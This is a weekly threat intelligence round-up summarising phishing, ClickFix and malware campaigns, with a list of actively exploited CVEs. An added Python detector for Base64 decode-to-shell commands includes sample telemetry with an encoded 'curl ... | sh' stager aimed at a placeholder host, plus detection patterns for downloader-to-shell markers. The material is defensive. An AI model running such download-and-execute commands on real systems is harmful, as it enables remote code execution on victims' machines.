The Silobreaker Weekly Geopolitical Risk Briefs


Weekly Cyber Round-up

Intelligence Report

May 8, 2025

Lampion malware campaign leverages ClickFix technique to target Portuguese organisations

Between late 2024 and early 2025, Palo Alto Networks Unit 42 researchers observed a malicious campaign leveraging ClickFix lures to deliver Lampion malware to Portuguese organisations within the government, finance, and transportation sectors. The campaign adopts patterns seen in previous Lampion campaigns, including the use of highly obfuscated VBScripts and social engineering themes. The infection chain was divided into several non-consecutive stages, each executed as a separate process that would appear benign in isolation. Victims were initially sent a phishing email with a ZIP attachment containing an HTML file, which redirected to a website spoofing a Portuguese tax authority. After execution of the first stage, an obfuscated second-stage downloader, disguised as a PHP file, is written to the TEMP folder. The third stage is responsible for reconnaissance and detection evasion measures, and creates an execution method for the fourth stage, a DLL loader.


CoGUI phishing kit targets organisations in Japan

Proofpoint researchers observed an increase in high-volume Japanese-language phishing campaigns targeting organisations in Japan to deliver a phishing kit called CoGUI. The campaigns primarily impersonate popular consumer or payment brands, such as Amazon, PayPal, Rakuten, and others, and aim to steal usernames, passwords, and payment data. Several other campaigns were also observed targeting users in Australia, New Zealand, Canada, and the United States. CoGUI has been active since at least October 2024 and uses several advanced defence evasion techniques. Before serving the phishing page, CoGUI profiles the victim, though the profiling often varies by campaign. CoGUI is likely used by multiple different Chinese-speaking threat actors. The researchers also observed similarities between CoGUI and recent Darcula road toll smishing attacks, but stated that Darcula is unrelated to CoGUI and that its presence in road toll smishing is notably different.

Mystery box subscription scams leverage Facebook pages and ads for financial gain

Bitdefender researchers identified an increase in campaigns leveraging sophisticated fraudulent websites to facilitate subscription scams. The threat actors create Facebook pages and ads impersonating content creators to promote the ‘mystery box’ scam, alongside other variants. The scam has recently evolved to include a subscription model that, for a recurring payment, seemingly provides the user with exclusive deals and savings. Several techniques have also been adopted to evade automatic detection, including running multiple versions of an ad with only one being malicious, uploading images directly from Google Drive, using cropped images to alter visual patterns, placing text only inside images, and leveraging classic homoglyph techniques. Over 200 websites have been observed as part of the campaign, some of which are still in operation. Some of the Facebook pages are newly created, while others are existing accounts hacked and taken over by the attackers.

Venom Spider leverages server polymorphism in More_eggs deployment

Since at least October 2023, Arctic Wolf researchers have observed a spear phishing campaign by the financially motivated threat group Venom Spider targeting hiring managers and corporate human resources departments. The campaign abuses legitimate messaging services and job platforms to apply for real jobs using fake resumes that deliver an enhanced version of the More_eggs backdoor. Spear phishing emails sent directly to the victim contain links that redirect to an attacker-controlled website, where the victim is asked to complete a CAPTCHA challenge. If completed, a ZIP file is downloaded containing a decoy image and a malicious LNK file disguised as a resume. The LNK launches a batch script which triggers a JavaScript payload that drops a complex executable library, dubbed More_eggs_Dropper. Once active, More_eggs establishes C2 communication to facilitate the execution of various commands.

MacReaper watering hole campaign targets macOS users with Atomic Stealer

BadByte researchers discovered a watering hole campaign, dubbed MacReaper, targeting macOS users with Atomic Stealer malware. The campaign was initially discovered on May 4th, 2025, through a compromised Brazilian news site. The researchers identified approximately 2,800 potentially compromised websites, suggesting a coordinated operation that is likely exploiting vulnerabilities in website hosting or content management systems. The campaign targets users with a ClickFix fake reCAPTCHA interface, which triggers a Binance Smart Chain contract leveraging the EtherHiding technique to deliver a Base64-encoded command to the clipboard. Users are prompted to run the command via macOS-specific shortcuts, which downloads a script that retrieves Atomic Stealer.
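Both the Lampion and MacReaper items above turn on the same ClickFix mechanic: the victim is talked into pasting a Base64-encoded command into a terminal, and the command decodes itself and hands the result to a shell. The following Python is an added example (not part of the round-up, and not code from Unit 42 or BadByte) showing how a defender can triage process-execution telemetry for that decode-and-execute shape. The event records, the placeholder stager URL and the field names are all constructed here and are not indicators from the briefing.

```python
import base64
import binascii
import re

# Decode-to-shell sink, form 1: decode output piped straight into a shell,
# e.g. "echo <blob> | base64 -d | sh" (macOS base64 also accepts -D).
PIPE_TO_SHELL = re.compile(
    r"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:/bin/)?(?:sh|bash|zsh)\b"
)
# Form 2: decode output substituted into a shell invocation,
# e.g. bash -c "$(echo <blob> | base64 -D)".
SUBST_TO_SHELL = re.compile(
    r"(?:sh|bash|zsh)\s+-c\s+.*\$\(.*base64\s+(?:-d|-D|--decode)"
)
# Candidate Base64 tokens: long enough not to be an ordinary word or path.
B64_TOKEN = re.compile(
    r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])"
)
# Markers a decoded stager typically carries: a downloader feeding a shell.
STAGER_MARKERS = ("curl ", "wget ", "| sh", "| bash", "osascript", "nohup ")


def decode_candidates(cmdline):
    """Return (token, decoded_text) pairs for tokens that decode to readable text."""
    out = []
    for token in B64_TOKEN.findall(cmdline):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            continue  # not valid Base64, or binary rather than a script
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            out.append((token, text))
    return out


def triage_event(event):
    """Score one process event; returns a finding dict, or None if benign."""
    cmdline = event["cmdline"]
    reasons = []
    decoded = None
    if PIPE_TO_SHELL.search(cmdline) or SUBST_TO_SHELL.search(cmdline):
        reasons.append("base64 decode output fed to a shell")
    for _token, text in decode_candidates(cmdline):
        hits = [m for m in STAGER_MARKERS if m in text]
        if hits:
            reasons.append("decoded payload contains " + ", ".join(hits))
            decoded = text
            break
    if not reasons:
        return None
    return {"pid": event["pid"], "parent": event["parent"],
            "reasons": reasons, "decoded": decoded}


def triage_events(events):
    """Run triage_event over a feed and keep only the findings."""
    return [f for f in (triage_event(e) for e in events) if f]


# Constructed sample telemetry (hypothetical; URL is a placeholder).
STAGER = "curl -fsSL http://stager.example.invalid/s.sh | sh"
STAGER_B64 = base64.b64encode(STAGER.encode()).decode()

SAMPLE_EVENTS = [
    {"pid": 101, "parent": "Terminal", "cmdline": "ls -la /Users/alice"},
    {"pid": 102, "parent": "Terminal",
     "cmdline": f"echo {STAGER_B64} | base64 -d | sh"},
    {"pid": 103, "parent": "Terminal",
     "cmdline": "base64 -i report.pdf -o report.b64"},   # legitimate encode
    {"pid": 104, "parent": "Terminal",
     "cmdline": f'bash -c "$(echo {STAGER_B64} | base64 -D)"'},
]

if __name__ == "__main__":
    for finding in triage_events(SAMPLE_EVENTS):
        print(finding["pid"], finding["reasons"])
        if finding["decoded"]:
            print("  decoded:", finding["decoded"])
```

Two signals are deliberately kept separate: the sink pattern fires on the command shape alone, so it still catches a blob that decodes to something unreadable, while the decode step recovers the stager text for the analyst and rules out ordinary uses of the base64 utility, such as encoding a file.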

High Priority Vulnerabilities

Each entry lists the CVE, the affected software, and its base and temporal scores.

CVE-2025-27363 (FreeType): base score 8.1, temporal score 5.6
Related: Google patches actively exploited flaw in Android devices

CVE-2024-7399 (MagicINFO 9 Server): base score 8.8, temporal score 8.4
Related: Unauthenticated RCE flaw in Samsung MagicINFO 9 Server actively exploited

CVE-2025-3248 (langflow): base score 9.8, temporal score 7.0
Related: Critical Langflow Flaw Added to CISA KEV List Amid Ongoing Exploitation Evidence

CVE-2024-6047 (GVLX 4 V3): base score 9.8, temporal score 9.8
Related: Critical command injection flaws in discontinued GeoVision devices actively exploited

CVE-2025-34028 (Command Center Innovation): base score 10.0, temporal score 7.3
Related: Commvault CVE-2025-34028 Added to CISA KEV After Active Exploitation Confirmed
